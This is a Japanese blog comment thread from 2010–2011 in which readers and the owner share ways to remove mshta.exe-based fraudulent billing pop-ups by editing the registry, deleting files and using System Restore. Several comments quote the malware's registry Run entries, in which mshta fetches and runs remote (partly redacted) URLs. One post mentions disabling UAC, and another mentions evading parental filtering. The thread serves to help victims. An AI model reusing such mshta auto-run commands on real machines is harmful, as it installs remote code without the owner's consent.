<a href="http://gekkeijunoha.blog11.fc2.com/" title="月桂樹葉 トップページへ">mshta.exeによるワンクリック不正請求詐欺サイト 月桂樹葉

【駆除方法１】で駆除できました。
請求画面などで検索すると、
マニュアルでの削除は素人には無理とか書かれていて、
オンラインスキャンでもチェックされず、
mshta.exeで検索したところ、
このページにたどり着きました。
どうもありがとうございます。

[ 2010/11/07 03:34 ] [ 編集 ]

Re:ありがとうございます

コメントありがとうございました。
治すのに苦労なさったみたいですね。
お役に立てて幸いです(^_^)

[ 2010/11/07 12:54 ] [ 編集 ]

vistaでのファイル検索

こちらのサイトのおかげで請求画面が消えました。ありがとうございました。

私も駆除方法１でできました。
レジストリ削除はおかげさまで簡単にできたのですが、ファイルの場所がレジストリで見てわかっているのに検索できず、ファイルの削除に苦労したのでお役にたつかもと思い書かせていただきます。

ちなみにDocuments and settings＞アプリケーションデータの中にありました。
ＯＳはvistaです。

まず、通常のファイル検索ですと隠れているファイルやシステムファイルが表示できないので
１、エクスプローラーを開き＞整理のタブをクリック
２、フォルダと検索のオプションをクリック
３、表示のタブをクリック
４、すべてのファイルとフォルダを表示するにチェック
５、保護されたオペレーションファイルを表示しないのチェックを外す

これで表示できるようになります。
ただこの状態だとアクセス権限で拒否されてしまうので

１、Administratorでログイン
２、コントロールパネル＞ユーザーアカウント
３、ユーザーアカウント制御の有効化または無効化
４、コンピューターの保護に役立たせるのチェックを外す
５、対象のフォルダのプロパティ＞セキュリティ
６、アクセス許可のフルコントロールがチェックされていないユーザー（初期だとEveryone?)の削除
７、詳細設定をクリックし、「すべての子孫の既存の継承可能なアクセス許可すべてを、このオブジェクトからの継承可能なアクセス許可で置き換える」にチェックを入れる。

これでやっとアクセスできるようになるので後は削除するだけです。vistaは大変でした、、、
長文失礼いたしました。

[ 2010/11/10 08:55 ] [ 編集 ]

うさぎさんへ

長文ありがとうございました！！

当方は、XPのために、この操作はできません。
レジストリを削除すればファイルは存在していても請求画面は出ず悪さもしないのですが、
できれば、すっきりしたいもの。

高度な方法のようなので、意味が良くわからない方はレジストリの削除までにすること。
また、ファイルを削除した後は、アカウントの設定を元に戻したほうがいいでしょうね。

[ 2010/11/10 11:48 ] [ 編集 ]

現れなくはなったものの・・・

このサイトにたどり着く前に、タスクマネージャーからmshta.exeのプロセスを終了。(同時に画面に現れなくなった)
再起動しても、また現れることはない(スタートアップにも関連してないらしい)です。
ファイルは何一つゴミ箱送りにはしていません。
メールアドレスが心配です。

[ 2010/11/12 05:21 ] [ 編集 ]

pc_manさんへ

投稿ありがとうございました。

タスクマネージャで終了させたら、再起動してもタスクマネージャにmshta.exeが出なくなってどうしよう、ということでしたら…
タスクマネージャでは、現在バックグラウンドでどういうプログラムが動いているか表示しているので、そこからmshta.exeを終了したとしても、mshta.exeが削除されたわけではありません。

mshta.exeをタスクマネージャから終了させただけで、請求画面が削除できた、ということでしたら…
良かったと思います(^.^)ただ、その場合、【駆除方法２】のような時限式の可能性もありますので、一応、警戒しておいたほうがいいかもしれませんね。

[ 2010/11/12 14:43 ] [ 編集 ]

ぷるっぷーさんより

ぷるっぷーさんより以下のコメントをいただきました。

「
タイトル:助かりました＾＾

月桂樹葉さん　はじめまして

普段アダルトサイトに行かないだけに簡単に引っかかってしまいました＞＜；

状況が既出と少し異なるようなので、書いておきます。

レジストリの
コンピューターHKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun

その中にファイル名が下記の３つがあり
start_b1771942b89e69f0c9e541f6d5a1a37dc263e17b_233
start_b1771942b89e69f0c9e541f6d5a1a37dc263e17b_234
start_b1771942b89e69f0c9e541f6d5a1a37dc263e17b_235

それぞれ以下の様な文字列データが入っていました
C:WINDOWSsystem32mshta http://ima(中略).com
C:WINDOWSsystem32mshta http://ima(中略).com
C:WINDOWSsystem32mshta http://igb(中略).com

一番上のアドレスへ飛んだところ、画面に出力される請求画面で、下の２つは何もありませんでした。
私は３つとも消し問題なかったですが、一番上だけ消しても表示されなくなります。

そのあと日付で検索をかけた結果、画面を開いたその時間に５つのファイルが作成されていることを発見
C:WINDOWSPrefetch内に
MSHTA.EXE-331DF029.pf　　　 ←ブラウザ用のMSコマンドらしい
SCHTASKS.EXE-0CBF6A11.pf　　←バッチファイルを動かすらしい
WMPLAYER.EXE-18DDEF9C.pf ←MSのメディアプレーヤーを動かすらしい
CONIME.EXE-13EEEA1A.pf　　　←コマンドプロンプトと関係あるらしい
SETUP_WM.EXE-3135CBD6.pf　　←MSのメディアプレーヤーと関連あるらしい

上の２つは怪しいだけに消したかったですが、上の３つは削除どころかメモ帳で開くことすらできませんでした。
ただ、http://esupport.trendmicro.co.jp/Pages/JP-28565.aspx
でpfファイル自体には不正コードは含まれないとのこと、それを信じて作業終了することにしました。

月桂樹葉さんのお陰で容易に表示させなくできました感謝感謝ですｗ

ＰＳ

＞そういえはビビアン・スーさんが完全ヌード写真集のを取ったときの動画が流出しているんです。

↑というコメントにまんまと乗せられて怪しいなぁと思いながらもビビアン見たさにチャレンジ・・・
復旧後確認しましたがビビアンは出て来ない唯のアダルトサイト。悔しいので一通り見てやりましたｗ
」

＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊

月桂樹葉のコメント

新しい情報を詳しくありがとうございました!!
サイトのURLが書いてあったので、リンクを間違って踏んで誤爆する方が出ないように、
そこの部分だけ編集させていただきました。折角書いていただいたのにすみません。
また、そのURLは危ないURL一覧のサイトにもう登録されているようです。

PSの「悔しいので一通り見てやりました」の部分を読んで笑ってしまいました。
けれども、さらなる罠が潜んでいることも考えられますので、他の方は真似なさらないように(^^;;

[ 2010/11/12 15:24 ] [ 編集 ]

スタートアップにもレジストリにもTasksにも怪しいファイルはありませんでした…。
感染した日時も覚えていません…。
復元しかないでしょうか。

[ 2010/12/05 15:00 ] [ 編集 ]

aaaaさんへ

上の「ぷるっぷーさんより」というコメントにあるようなRunの中の不自然な物はありませんでしたか？

[ 2010/12/05 15:22 ] [ 編集 ]

返信ありがとうございます。

再度探してみましたがそのようなファイルは見当たりませんでした。
場所はあってる筈なんですが…。

[ 2010/12/05 16:29 ] [ 編集 ]

aaaaさんへ

そうでしたか…。
感染日もわからないということでしたら、復元するのが確実かもしれませんね。
復元対象として指定した日から現在までに行ったアプリケーションソフトウェアのインストール、アップデートの情報は消えてしまいますので、これらはシステム復元後に再度インストール、アップデートを実施してくださいね。

[ 2010/12/05 18:16 ] [ 編集 ]

返信ありがとうございます。

そうですか、ありがとうございます。

復元をすると保存したファイルなどは消えるのですか？

[ 2010/12/05 18:46 ] [ 編集 ]

aaaaさんへ

消えないはずですが、重要なデータは念のためバックアップを取ることを勧めているメーカーもあります。

[ 2010/12/05 22:20 ] [ 編集 ]

このサイトを参考に架空請求のウインドウを消す事が出来ました＞＜
ありがとうございます。

自分の場合ではHKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
に shfa というファイルが存在しておりこれがmshtaに関連しているようでした。

"shfa"="C:\\WINDOWS\\system32\\mshta.exe \"C:\\Documents and Settings\\kamikami\\Application Data\\shfa\\movie.hta\""

となってました。
詳しい事はわかりませんがお礼を兼ねて報告させていただきますm(__)m

このレジストリを消したところ再起動してもウインドウは開きませんでした。

[ 2010/12/05 22:34 ] [ 編集 ]

villさんへ

消えて良かったです(^^)
また、詳しいご報告ありがとうございました。
これで、今夜はぐっすり眠れますねｖ

[ 2010/12/05 23:14 ] [ 編集 ]

ありがとうございます（泣）

３時間ほど前に、ワンクリック詐欺にあってから、ずっとパソコンと格闘していました。
請求の画面が消えず、パソコンに明るくない私はずっと検索ワードを入れながらこちらにやっとたどり着き、請求画面はようやく消えました！！

Ｖｉｓｔａのセーフモードでのシステムの復元で回復しました。
システムの復元については知恵袋などでも紹介されていたのでやってみたのですが、こちらほど詳しくなく解決しませんでした。
しかし、こちらのサイトは本当に詳しく解説されていて、おかげさまでいつものきれいな画面になりました。

初期化するしかないのかと、どん底に落ちていましたが、本当によかったです！
ありがとうございました。

感動しすぎて長文になってしまいましたが、本当に感謝しています。

[ 2010/12/30 01:00 ] [ 編集 ]

削除ソフト

S…という削除ソフトを薦めてくださった方がいらっしゃったので、
Googleで調べましたところ、詳しい解説サイトの中に
セキュリティソフトにひっかかるサイトがありました。

"見つかったウィルスの数109"と表示されました。
そのソフトについて調べようとする他の方にウィルスが感染するといけませんので
残念ながらコメントを削除させていただきました。
すみません。

また知名度の高いソフト以外は安全性が確認できませんので、
ソフトを使わない方法を紹介していただけると助かります。

------------------------------------------------------

ゆりさんへ

新年を明るい気持ちで迎えられそうで良かったです！
コメントありがとうございました。

[ 2010/12/30 13:50 ] [ 編集 ]

やっと

駆除方法２で解決しました。
ほんとにウザイ広告でしたので助かりました。
ありがとうございます！

[ 2011/01/08 13:37 ] [ 編集 ]

はじめまして

はじめまして。当方もひっかかってしまいました。

win vista環境で
C:\ProgramData\adhhh
なるフォルダが作成されており、
ご丁寧に表示されるjpgなどが格納されて
いましたので、adhhhというフォルダ名を
変更して（削除でもよいのかもしれません。）
駆除方法1のレジストリを削除しました。

このフォルダ配下には
2.dat
bg.jpg
x5961755.hta
という３つのファイルがありました。

あまーい言葉にだまされることながいよう以降気をつけます！

[ 2011/01/10 18:26 ] [ 編集 ]

パラメヒコマンさんへ

余程、あまい言葉だったのでしょうね！
詳しいご報告ありがとうございました。

[ 2011/01/10 21:16 ] [ 編集 ]

私もパラメヒコさんと同じファイルが原因だったのですが、
runのフォルダには該当するデータが見つからなかったので
レジストリ内全てを検索してみてようやく発見できました。
ただレジストリを検索する際は、あらかじめ検索設定の「値」のチェックを外す必要がありそうです。(そうしないと検出されませんでした)
その後「mshta」と入力して、検索結果から「webadhhh」というものが表示されれば、多分ビンゴです

[ 2011/01/17 10:40 ] [ 編集 ]

Re:

一般的にファイルの名前はいろいろあるのですが、同じだったのですね。
ご報告ありがとうございます。

[ 2011/01/17 22:19 ] [ 編集 ]

今日の４時ごろやられてしまいました・・・
スタートの検索をクリック、日付けを指定、１月１９日で検索しました。
次に４時ごろに更新されたファイルは全て消しました。
これでよかったのでしょうか？

[ 2011/01/19 21:20 ] [ 編集 ]

Re:

それは、ちょっとまずいような気もしますが、
ちょっとこの1,2日、仕事で寝る時間もないありさまで詳しいアドバイスができません。
すみません。

どなたか、上のお名前なしの方にアドバイスお願いします<m(__)m>

[ 2011/01/20 01:02 ] [ 編集 ]

ダメでした。

今日起動したらまたあの画面が出てきました。
ちなみに駆除方法1のやりかたで、スタートアップのタブのなかにmshta exeがありませんでした。

方法2のやりかたではC\Windows\System32\Tasksの中を探す方法が分かりませんでした。
アドバイスお願いします。
初心者ですいません。

[ 2011/01/20 17:03 ] [ 編集 ]

検索設定を変えてみましたか？
プログラムは、mshta.exeが動かしているので
検索欄にあらかじめ「mshta」と入力して、横にある
「値」のチェックをはずしてからレジストリを探してみてください。
そこでデータ名がアドレス(httpからはじまる物)になっていたり、webadhhh等の見た目からして怪しいものがあった場合にはデータを存在している場所を確認してから直に削除しましょう

[ 2011/01/23 21:53 ] [ 編集 ]

webadhhhについてのコメントをくださる方

何度も投稿ありがとうございます(^_^)

以前から言っていますが、
良くわからない方、自信がない方は
レジストリを編集しないほうがいいですね。

[ 2011/01/23 22:42 ] [ 編集 ]

駆除方法１

駆除方法１の、○スタート→ファイル名を指定して実行→regedit.exeのやり方を何度かやりましたら、出なくなりました。

ほっとしました。
ありがとうございました！

[ 2011/01/25 13:03 ] [ 編集 ]

Re: 駆除方法１

beeさん、出なくなったとのこと良かったです(^^)v

[ 2011/01/25 13:49 ] [ 編集 ]

Re: おそらく・・・

kさんからのコメント

>　タイトル　おそらく…

> いままでの質問みさせてもらったので、だいたいあってると思うのですが・・・
> 自信がないのでアドバイスお願いします。
>
> 駆除方法１、２もだめでした。
> レジストリでHKEY_USERSのとこをmshtaで検索をしたら
>
> f!mshtaがあったので削除したのですが・・・
> もう一つ怪しいのが
> 名前：sitemap_35025eaed6ab1418d57cc5d36213923d
> データ：C:Windowssystem32mshta (h)ttp://exxx.oxxxxxxxx.net/reg2.php?cid=35025eaed6ab1418d57cc5d36213923d
>
> これも削除したらいいのでしょうか？
>
>
> HKEY_CURRENT_USERSでも検索したところ・・・
> 名前：mahta.exe
> データ：{"debug":null,"ei":"TtxATca1EYHCcaH-nNON","hasEbmTidbits":true,"href":"http://blog.trendmicro.co.jp/archives...と
> マウスカーソルをもっていっても表示できないくらい続いてます。
>
> HKEY_LOCAL_MACHINEでも検索したところ・・・
> 名前：f!mahta.exe
> データ：6d 00 73 00 68 00...と英数字が続いてます。
>
> こっちも削除ですか？
>
> ながながと書いてしまいましたが、よろしくお願いします。

***********************
ここからコメントの返信

すみません、間違って踏む人が出ないように一部xxxxと伏字にさせていただきました。
それで、今までの例からいくと、
(h)ttp://exxx.oxxxxxxxx.net/～
は、怪しいと思います。

他については、はっきりしたことは言えません。

一番怪しいところを削除して様子を見たらいかがでしょうか？
あくまでも自己責任で。

自信がなければ【駆除方法３】をおすすめします

なお、結果と怪しいデータがあったHKEY_USERS以下のパスも教えていただけると
他の方の参考になると思います。
（もちろん【駆除方法３】の結果でもいいです。）

[ 2011/01/27 23:53 ] [ 編集 ]

kさんへ

kさんより

> 怪しいのを削除してみようと思います。
>
> HKEY_USERS以下のパスは
>
> HKEY_USERS\S-1-5-21-29xxxxxxxx-18xxxxxxxx-25xxxxxxxx-1000\Software\Microsoft\Windows\CurrentVersion\Run

**************************
ここからコメントの返信です

やはりRunの中ですね。
情報ありがとうございました。

[ 2011/01/28 17:42 ] [ 編集 ]

Re: ダメでした。

遅くなってすみません（汗）
Tasksの中を探す方法について
少し、説明を加えましたが、いかがでしょうか。

[ 2011/01/28 18:16 ] [ 編集 ]

消えましたが・・・

怪しいのを削除したところ広告は消えました。

が・・・

パソコンの起動など動作は問題ありませんが
IEの調子が・・・
FLASHが表示されなかったり、ダウンロードできなかったり、起動するたびに「既定検索プロバイダーの設定が破損しています」とひどいです。

失敗なのか成功なのか・・・

とりあえず、レジストリ修復ソフトを入れて、どうにかならないかと
何か良いソフトがあればお願いします・・・

[ 2011/01/28 19:54 ] [ 編集 ]

Re: 消えましたが・・・

気になっていたことがあったのですが、
f!mshtaを削除したそうですが、
レジストリのHKEY_USERS以下のどこにありましたか？
具体的にどういうデータでしたか？
削除してはいけない物でなかったか心配です。

不調なのが確実にIEだけならば、IEを再インストールすれば直るかもしれません。

追加コメントで、あるレジストリ修復ソフトの具体名をあげていらっしゃいましたが、
ネット上の評判も必ずしも良くありませんし、安全性も確認できませんので、
当方としては、【駆除方法３】で
感染前のレジストリに戻した方がいいと考えます。

[ 2011/01/29 04:21 ] [ 編集 ]

方法２で無事に消すことができました！
丁寧な解説にとてもたすかりました。ありがとうございます。

[ 2011/01/29 17:51 ] [ 編集 ]

すげぇ！！立ち上がらなくなった！

レジストリとかmsconfigとか検索して片っ端から消したら今のところ出てこなくなりました！！
一昨日ぐらいから誤って押してしまい困っておりました。
本当に助かりました

[ 2011/01/29 19:18 ] [ 編集 ]

削除方法

あるアニメの動画というリンクで騙されて引っ掛かっちゃいました。
自分はオナルヒトというサイトに引っ掛かったのですが，レジストリエディタでキーを検索onaruと入力し,
値のチェックを外します。
その後レジストリにサイトアドレスの情報を持ったキーが抽出されます。
その大元のレジストリフォルダを削除すれば，その後は請求画面が表示されなくなります。
念のために，次を検索を選択し，レジストリ全体を検索することをお勧めします。

自分の環境はXP(SP3)です。

怪しいサイトでファイルのダウンロードがあったらキャンセルすべきですね。
皆さんも気をつけましょう！

[ 2011/01/30 00:02 ] [ 編集 ]

TSさん、うっかりさん、通りすがりさん

コメントありがとうございました。

>片っ端から消したら
うっかりさんは、訳がわかってる方だと思いますが、
初心者の方は、訳もわからず削除しないてくださいね。

>怪しいサイトでファイルのダウンロードがあったらキャンセルすべきですね。
いえいえ、怪しいサイトには行かないでください(-_-;)

[ 2011/01/30 01:19 ] [ 編集 ]

f!mshtaは怪しいやつと同じ場所です。
どういうデータだったか・・・すみません。はっきり覚えが・・・

[ 2011/01/30 13:51 ] [ 編集 ]

どうやらf!mshtaを削除したのがいけなかったみたいです。
たぶんそうです。

削除したレジストリ元に戻す方法ご存じないですか？

[ 2011/02/02 19:51 ] [ 編集 ]

ｋさんへ

感染日（不正請求画面が出るようなサイトを覗いた日）より前に保存された
「復元ポイント」へ「システムの復元」を行うことで、レジストリの状態を元に戻すことができます。
記事の駆除方法３のリンク先に詳しいことが書いてありますから参照してみてくださいね。

この操作によっても不正請求画面が出なくなるはずです。

[ 2011/02/02 20:55 ] [ 編集 ]

具体的で分かりやすい解説に感謝です。
おかげで解決しました。

私の周りで既に２人目(*_*)
最初の時はこちらを知らずにあれこれ苦労してやっと直りました。

初めからここを見ていればもっと簡単に原因と対策が分かったのに…と思いリンクを貼らせていただきました。

ありがとうございました。

[ 2011/02/07 12:18 ] [ 編集 ]

しゃけべんさん

紹介していただいたとのこと、ありがとうございます(^o^)丿

[ 2011/02/08 22:32 ] [ 編集 ]

助かりました。

月経葉樹さんのページと以前にどなたかのコメント(かなり最初の方)であった方法を、ためさせて頂きました。　ほとんど全部削除することができました。

ほとんど、と言うのは『○スタート→ファイル名を指定して実行→msconfig.exeと入れて「スタートアップ」etc』の画面を出すとまだ名前だけは残っています。

ちなみに私がmashta.exeにたどり着いたのは、タスクマネージャーを押し違法プログラムを×で消したときに少しでる、プロセスのCPU変化で判断しました。

[ 2011/02/09 02:00 ] [ 編集 ]

SENNさん

> プロセスのCPU変化で判断しました。
おー、上級ワザですね。

[ 2011/02/09 03:12 ] [ 編集 ]

自信が付きました

mshta.exeのプロセスを終了しても、自動起動していたからタスクが怪しいだろうなと思っていました。タスクを見てみると、2分間隔でvbスクリプトを起動していたのでこれで確定しました。vbsファイルはユーザフォルダの中に生成されていました。タスクとvbsファイルの削除で対応完了しました。ありがとうございました。

[ 2011/02/24 10:32 ] [ 編集 ]

Re: 自信が付きました

2分間隔とは、ひどいですねヽ(｀△´)ノ
【駆除方法２】を応用されたということですね。
新情報ありがとうございました！

[ 2011/02/25 00:42 ] [ 編集 ]

手動削除の方法について！

私も恥ずかしながらかかってしまったんですが、まだ学生なのでＰＣに制限がかかっていて、１と３の方法ができないので、手動でどうにかする方法をやってみたんですが、日付検索をしてもでてきません；
Ｃ￥ＷｉｎｄｏｗｓなんとかＴａｓｋｓはどうやって開くのでしょうか…英文入力苦手＞＜；
レジストリ内部を検索しても怪しげなファイルは見あたりませんし…　うあーーー
親には絶対ばれたくないので、どうかお願いします！
かかったサイトは「素人動画サイト」というやつです。
長文すみません…

[ 2011/02/27 17:01 ] [ 編集 ]

Re: 手動削除の方法について！

質問をそのまま受け取ってお答えすると
PCの画面の右下のスタートを右クリック→エクスプローラーをクリック
すると新しい窓が開きますから、左のほうのフォルダ一覧の中から
マイコンピュータ→C:→WINDOWS→Tasksとクリックしていきます。
そうすると窓の右にタスクの一覧が現れます。
請求画面を消した状態で
怪しげなタスクをフォルダの外に出して、
再び請求画面が出なくなればそのタスクが原因である可能性があります。

タスクの内容を確認するには、
怪しげなタスクを右クリック→プロパティ→タスクTabの中で
実行するファイル名がわかりますので、
こうやってチェックすることもできます。

しかし、ここに原因が必ずあるというわけではありません。
また、タスクの削除を間違うと必要なタスクを削除してしまいます。
いろいろ変なことをしてパソコンが使えなくなったらもっとたいへんです。
残念ながら猛毒きのこさんは、その可能性があります。
ここは、あきらめておうちの方に事情を話したほうがいいかもしれません。

アダルトサイトを覗かなくても、掲示板や
メールに添付されたリンクをクリックしていって請求画面が出てくることもあるそうですから。

間違っても送金だけは、しないように。
かえって個人情報を相手に渡すようなもので危険です。
万一、支払ってしまった場合などは、最寄りの警察署へ相談しましょう。
また、おうちの方にフィルタリングソフトを入れてもらうといいですね。

[ 2011/02/27 18:46 ] [ 編集 ]

tasksは見つけましたが…　

情報ありがとう御座います！
そして返信の早さに驚き。
タスクについては、パソコンがウインドウズ７なので少し異なっていましたが、見つけることはできました。
ですが、タスクの中にはいませんでした。
でも、もう少し悪あがきをしてみようと思います。　　　
前回mshtaをいじって止めればいいかと思い、思いつくだけのことはしましたが、制限がかけられていましたし、プロセスを止めても無駄でした。mshtaを止める方法は他にありませんでしょうか…；

フィルタリングについては、セーフモードを利用して一時的に止める方法を見つけましたので、うかれていたら引っかかったということです；
十分反省しております……
でも、親にはいえません。私の父は前の方のように優しくはないので。なので、どうしても自分で終わらせたいんです。パソコンについては下の中くらいしか知りませんが、検索と、ヘルプとサポートを駆使してやっていけると思いますので、どうか、お願いします！！

３日すぎても消えなかったのですが、「契約期間」とやらをこえれば消えるのでしょうか、これ。
ともかく、早くなくなって欲しいです。

[ 2011/02/27 20:39 ] [ 編集 ]

Re: tasksは見つけましたが…　

> そして返信の早さに驚き。
忙しい時は、コメントを何日もチェックできない時もありますので、
今回はたまたまお返事がすぐできたのです。

> フィルタリングについては、セーフモードを利用して一時的に止める方法を見つけましたので、うかれていたら引っかかったということです；
> 十分反省しております……
もう、２度とフィルタリングを回避しないでくださいね。
別のウィルスに感染して個人情報など漏れたらたいへんですから。

さて、一応、次にすることを考えますと
Runの中に怪しい物はなかったのですね。
tasksのタスク一覧の中にvbsファイルを実行しているものは、ありませんでしたか？
また、感染日時と同じ時間に作成されたファイルの中にhtaファイルがないとすると
vbsファイルはありませんでしたか？あれば、それは怪しいファイルということになります。

お父上を存じ上げないので、何とも言えませんが、
報告すると、そんなにお怒りになりますでしょうか。
雷ひとつくらいですみませんかね。
かえって、おまえもコンピュータに詳しくなったな、とほめてくれたりしませんかね。

>
> ３日すぎても消えなかったのですが、「契約期間」とやらをこえれば消えるのでしょうか、これ。
当方は感染したことがないのでわかりませんが、
もし消えたら、他の方の参考にもなると思いますので、ご報告ください。

また、他の方で消えたとか消えないとかご経験がある方がいらっしゃいましたら、
猛毒きのこさんのためにご一報いただけるとありがたいです。

[ 2011/02/28 01:25 ] [ 編集 ]

私の場合

私の成功例？です（まだ確実かはわかりませんが＾＾；）

上記の方法でもhtaファイルが見つからなかったので以下のようにやってみました。

ちなみに、OSはwindows7です。

・例の画面が開いてる状態でタスクマネージャを開きます。
・アプリケーションのタグの表示画面で、例の画面の表示の部分を右クリック
・プロセスの表示を選択
・プロセス一覧の画面に自動的に遷移し該当のプロセスが選択されてるので、右クリックで、ダンプファイルの作成を選択
・ダンプファイルが作例され、ファイルの場所が表示されるので、そのファイルの拡張子を.txtなどに変更してエディタで開けるようにする（ファイルがでかいので時間がかかります）
・あとはそのファイルを開いて、「.hta」で検索すると、ファイルのありかがヒットします！
・そのファイルを削除で、今のところ、うまくいってるようです＾＾

[ 2011/03/02 01:35 ] [ 編集 ]

Re: 私の場合

お役にたてればさん、ありがとうございます！
Windows７で、そういう対処の仕方があるのですね！
XPでは、
> 右クリックで、ダンプファイルの作成を選択　
の部分からができないようですが…。

手順をまとめていただき、ありがとうございました。
たぶん確実に削除されたと思います。
これで救われる方が多くいらっしゃるでしょう。
（意味がわかる方だけ、トライしてくださいね。）

[ 2011/03/02 02:59 ] [ 編集 ]

あと一歩！？

お役に立てればさんの報告で、いけるところまできたんですけれど、最終的にたどりついたのがnvStart.exeだったのです。そして、つづきの文に/htmlres/start.htaとかかれてあったのですが…
これは、アプリケーションの中にファイルが潜んでいるのでしょうか！？それとも、また別の意味があるのでしょうか！？
聞いてばかりですみませんが、超初心者なので…＞＜；

[ 2011/03/02 21:02 ] [ 編集 ]

Re: あと一歩！？

そのファイルhtmlres/start.htaを捜してダブルクリックして
同じ画面が出てくれば当たり！（削除）でしょう。
見つからない場合は、nvStart.exe(まともすぎる名前ですが）を
ダブルクリックすると画面が出てくるかもしれません。
お役に立てればさん、他の方、どう思われますか？

[ 2011/03/03 00:00 ] [ 編集 ]

感染しました

ノートPCにて感染しました。。
Alt+F4によって請求画面は出なくなったのですが、
これだけで大丈夫でしょうか？？

後々高額な請求をされたりしないか心配です。

[ 2011/03/05 00:44 ] [ 編集 ]

Re: 感染しました

> ノートPCにて感染しました。。
> Alt+F4によって請求画面は出なくなったのですが、
> これだけで大丈夫でしょうか？？

また、出るかもしれません。
出た時は、記事やコメントを参考にしてみてください。

>
> 後々高額な請求をされたりしないか心配です。

もし、個人情報を入力してしまってしつこく請求された場合は、
その画面を記録して最寄の消費生活センターに相談しましょう。

[ 2011/03/05 02:25 ] [ 編集 ]

返信ありがとうございます！

しばらく様子を見てみます。
今後は気軽なクリックはやめるように心がけます。笑

[ 2011/03/05 02:41 ] [ 編集 ]

助かりました

助かりました;;;
どこのサイトを覗いて引っかかったのかはわかりませんが、こちらの対処法で何とかなりました。

ありがとうございました＾＾

[ 2011/03/05 15:49 ] [ 編集 ]

Re: 助かりました

良かったです(^^)

[ 2011/03/05 16:02 ] [ 編集 ]

報告

私の場合はwin7 64bitですが、C:\Users\ユーザー名\AppData\Roaming\fieldのフォルダ内にregisterと画像ファイルがありそれを削除するといけました、上記に記載されている方法では発見できませんでしたが、Cドライブをファイル名htaにて検索し発見にいたりました。ご報告させていただきます。

[ 2011/03/06 18:02 ] [ 編集 ]

Re: 報告

私の友人の場合この方法で見つからなかったので
htaファイルはすぐに検索できない所に作られていると思っていました。
上の方のコメントでうさぎさんも、そのようなhtaファイルの
vistaでの削除の方法を紹介してくださっています。

2010.09.01の治りましたさんからも似た報告がありますが、
この方法で有効な場合も多くあるということがわかりました。
ご報告、どうもありがとうございました！
近いうちに記事にも反映させていただきます。

[ 2011/03/07 01:35 ] [ 編集 ]

Re: なんじゃこりゃ

猛毒きのこさんからのコメントです。
一応、他の方が間違って踏まないように
リンクを無効にして掲載させていただきました。

> これだけヒントをもらっていながら、いまだに攻略できていない猛毒きのこです。
> 感染した次の日から、、起動したとき限定で謎のアプリケーション（？）の画面が出てきます。
> 真っ白で何も描かれていませんが、そのアプリケーションのプロパティに
> 全般　利用不可
> プロトコル　HyperTextTransfer Protocoi
> 種類　ＨＴＭＬ　ドキュメント
> 接続　暗号化無し
> アドレス（ＲＵＬ）
ttp://www.tera.erocenter.info/rog2.php?cid=6a…
> サイズ　７１７６バイト
> と、かかれておりました。
> Microsoft Excel で開くと、例の画面が現れました。
> ソースの表示でメモ帳が開かれたので、文字をかえると、C:users～～AppDataLocalMicrosoftWindowsTemporary IntemetFilesContent.IE53H7EXZOXreg2[1]
> への変更内容を保存しますか？
> とでたので、全消しして、適当に文字をうってみました
> が、どうやら無駄だったみたいで、また例の画面がでてきてしまいました。
> でも、これを利用してどうにか出来るかもしれません。
> だれか、何かいい方法あれば、教えてほしいです。
> 英文うつの苦手だぁ…もう二度とこんな事にならないようにしたいです＞＜

*********************************
ここからコメントの返信です

探しあてましたね。
猛毒きのこさんの場合、起動時にネットに接続して請求画面を出しているのです。
そのURLが上に記されたものです。

レジストリの編集ができるのであれば、
レジストリエディタで
編集→検索→上のURLの一部を入れて検索してみてはいかがでしょう？
データに上のURLが書いてあるものがあれば削除します。
ただし、レジストリの編集はリスクを伴うことを覚悟してください。

見つからない場合、
管理者権限がなくてもできる
システムの復元を試してみては？
http://pasofaq.jp/controlpanel/nusrmgr/7restration.htm

うまくいったらご報告よろしくお願いします。
（レジストリにあった場合は、レジストリの場所も）

[ 2011/03/07 03:31 ] [ 編集 ]

助かりました

　百度で検索中、リンクをたどっていくうちに引っかかりました。
　こちらの記述を元に対処したところ、見事にポップアップしなくなりました。ありがとうございます。

　なお、当方が引っかかったのは変異型らしく、悪玉はvespa(無意味な長い数列).vbsというＶＢスクリプトでMyDocument直下に勝手に居座っていました。感染キーはHKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Runでした。
　

　

[ 2011/03/07 15:19 ] [ 編集 ]

私のパソコンはコントロールされていて、mshtaの名前をかえて使えなくすることも、システムの復元も出来ませんでした。アンチウイルスソフト等でふるぼっこすることも、インストール自体禁止されてるので、無理でした；つまり、手動しか方法がないわけで…
レジストリは、管理人が入れたりした物は無理なようですが、自分の物なら消せるようです。
そこで、php?と検索してみたところ、Runというのが
引っかかったので、ためしに、中身の４っつの内一つを
消したところ、サクッと消えてしまいました。（大丈夫かなあ？）
どうやらこれは、私が入れた物らしいですけれど、
Runは怪しいファイルなんでしょうか？
みなさんも言っていますし…そこのあたりを教えてほしいです。よろしくお願いします。

[ 2011/03/07 20:24 ] [ 編集 ]

Y.さん、猛毒きのこさん

Y.さん
MyDocumentに居座るとは、図々しいですね。
ご報告ありがとうございました。

猛毒きのこさん
管理者権限がなくてもできるシステム復元の方法をリンクしてみたのですが、
（情報処理推進機構のシステムの復元の方法とは違います。）
レジストリを検索して削除したら画面が消えたのですね。
削除したレジストリのデータ値がわかるともっと確実ですが、
　自分が作成したレジストリキーであれば削除できること、
　Runにあったこと(ここにあるとOS起動時に自動的に実行されます）、
　画面が消えたこと
を考えると大丈夫なのでは。
良かったですね！

[ 2011/03/07 22:39 ] [ 編集 ]

あららぁ

再起動するとまた現れましたー。
でも、まんまとありかを見つけられました！
のはいいんですが、インターネットショートカットと何かのファイルの２つが、どういう訳か、削除をクリックしてもきえずに、居座っています。
これは、どう消せばいいのでしょうか！？

[ 2011/03/13 18:10 ] [ 編集 ]

Re: あららぁ

情報が少ないので、良くわかりませんが、
新しいのですか？それとも、前の続きですか？

いずれにせよ、3/7のコメントにある
管理者権限がなくてもできるシステムの復元を試してみては？

[ 2011/03/14 02:02 ] [ 編集 ]

うぁぁ

その方法も試したんですが、見事にシステムの復元という項目がありませんでした。
何があったのだろう…
話の続きですが、２つの妙なファイルは、アドレスが
なんじゃこりゃ　にかかれてあったものと同じでした。
たぶん、そのヘンなファイルがなんどもウェブページを表示させていて、インターネットショートカットが、そのページのショートカットなんだとおもいます。
